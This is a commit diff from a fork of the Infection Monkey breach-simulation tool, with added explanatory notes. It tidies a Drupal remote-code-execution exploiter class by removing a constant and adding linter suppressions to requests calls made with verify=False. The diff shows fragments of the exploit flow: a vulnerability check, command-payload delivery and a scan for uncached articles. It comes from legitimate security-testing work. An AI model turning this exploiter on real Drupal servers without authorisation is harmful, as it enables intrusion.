forked from p15670423/monkey
Merge pull request #824 from guardicore/minor-deadcode-deletion
minor fixes
commit 039a36c5ed
@@ -72,7 +72,7 @@ script:
 ## Display the linter issues
 - cat flake8_warnings.txt
 ## Make sure that we haven't increased the amount of warnings.
-- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=90
+- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=80
 - if [ $(tail -n 1 flake8_warnings.txt) -gt $PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many python linter warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi

 ## Check import order
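Note on the hunk above: the build writes the flake8 output to flake8_warnings.txt with the total warning count on the last line (that is what the `tail -n 1` in the one-liner relies on) and fails when the total exceeds the ceiling, lowered here from 90 to 80. A minimal Python sketch of the same gate, assuming that file layout; the shell one-liner above is what actually runs in CI:

import sys

UPPER_LIMIT = 80  # mirrors PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT

# Read the warning total from the last line, as `tail -n 1` does in the CI one-liner.
with open("flake8_warnings.txt") as f:
    warning_count = int(f.readlines()[-1].strip())

if warning_count > UPPER_LIMIT:
    print("Too many python linter warnings! Failing this build.")
    sys.exit(1)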
@@ -21,7 +21,6 @@ LOG = logging.getLogger(__name__)
 class DrupalExploiter(WebRCE):
     _TARGET_OS_TYPE = ['linux', 'windows']
     _EXPLOITED_SERVICE = 'Drupal Server'
-    DRUPAL_PORTS = [[80, False], [443, True]]

     def __init__(self, host):
         super(DrupalExploiter, self).__init__(host)
@@ -73,7 +72,7 @@ class DrupalExploiter(WebRCE):
         """
         payload = build_exploitability_check_payload(url)

-        response = requests.get(f'{url}?_format=hal_json',
+        response = requests.get(f'{url}?_format=hal_json',  # noqa: DUO123
                                 json=payload,
                                 headers={"Content-Type": "application/hal+json"},
                                 verify=False)
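A note on the `# noqa: DUO123` markers added in this hunk and the ones below: each one silences a single flake8/dlint finding on that line only. DUO123 appears to be dlint's rule against requests calls that disable certificate verification (`verify=False`), which this exploiter does deliberately. A short illustrative sketch of the pattern; `fetch_node` is a hypothetical helper, not part of this commit:

import requests


def fetch_node(url: str) -> requests.Response:
    # verify=False is intentional for this tool (targets commonly present
    # self-signed certificates), so the linter finding is suppressed for this
    # line only; the rest of the file is still checked.
    return requests.get(f'{url}?_format=hal_json',  # noqa: DUO123
                        verify=False)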
@@ -90,11 +89,11 @@ class DrupalExploiter(WebRCE):
         base = remove_port(url)
         payload = build_cmd_execution_payload(base, cmd)

-        r = requests.get(f'{url}?_format=hal_json',
+        r = requests.get(f'{url}?_format=hal_json',  # noqa: DUO123
                          json=payload,
                          headers={"Content-Type": "application/hal+json"},
                          verify=False)

         if is_response_cached(r):
             LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
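The cache check above calls a helper whose body lies outside the displayed hunks. A plausible sketch, assuming Drupal's page cache advertises hits through an `X-Drupal-Cache: HIT` response header; the header name and comparison are assumptions, not code from this commit:

import requests


def is_response_cached(r: requests.Response) -> bool:
    # Assumed behaviour: a cached response carries 'X-Drupal-Cache: HIT',
    # in which case the injected payload may never have reached the
    # vulnerable, un-cached code path.
    return r.headers.get('X-Drupal-Cache', '').upper() == 'HIT'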
@@ -111,7 +110,7 @@ class DrupalExploiter(WebRCE):
         :return: vulnerable URL to exploit
         """
         return self.vulnerable_urls.pop()

     def are_vulnerable_urls_sufficient(self):
         """
         For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.
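The body of `are_vulnerable_urls_sufficient` is cut off by the hunk above; its docstring states that the full attack needs 5 distinct URLs. A standalone sketch of that sufficiency check, with an illustrative signature and constant that are not taken from the commit:

MIN_VULNERABLE_URLS = 5  # assumption drawn from the docstring above


def are_vulnerable_urls_sufficient(vulnerable_urls: list) -> bool:
    # Each exploitation step pops one URL off the list (see get_target_url above),
    # so at least five distinct vulnerable URLs must be available before starting.
    return len(vulnerable_urls) >= MIN_VULNERABLE_URLS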
@@ -137,7 +136,7 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
     articles = set()
     while lower < upper:
         node_url = urljoin(base_url, str(lower))
-        response = requests.get(node_url, verify=False)
+        response = requests.get(node_url, verify=False)  # noqa: DUO123
         if response.status_code == 200:
             if is_response_cached(response):
                 LOG.info(f'Found a cached article at: {node_url}, skipping')
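The final hunk shows only part of the article-scanning loop. A self-contained sketch of the idea it implements, probing node IDs and keeping the ones that answer HTTP 200 without a cache hit; the function name, the header check, and everything past the displayed lines are assumptions for illustration:

import logging
from urllib.parse import urljoin

import requests

LOG = logging.getLogger(__name__)


def find_uncached_article_ids(base_url: str, lower: int = 1, upper: int = 100) -> set:
    # Illustrative standalone variant of the loop shown above.
    articles = set()
    while lower < upper:
        node_url = urljoin(base_url, str(lower))
        response = requests.get(node_url, verify=False)  # noqa: DUO123
        if response.status_code == 200:
            if response.headers.get('X-Drupal-Cache', '').upper() == 'HIT':
                LOG.info(f'Found a cached article at: {node_url}, skipping')
            else:
                articles.add(lower)
        lower += 1
    return articles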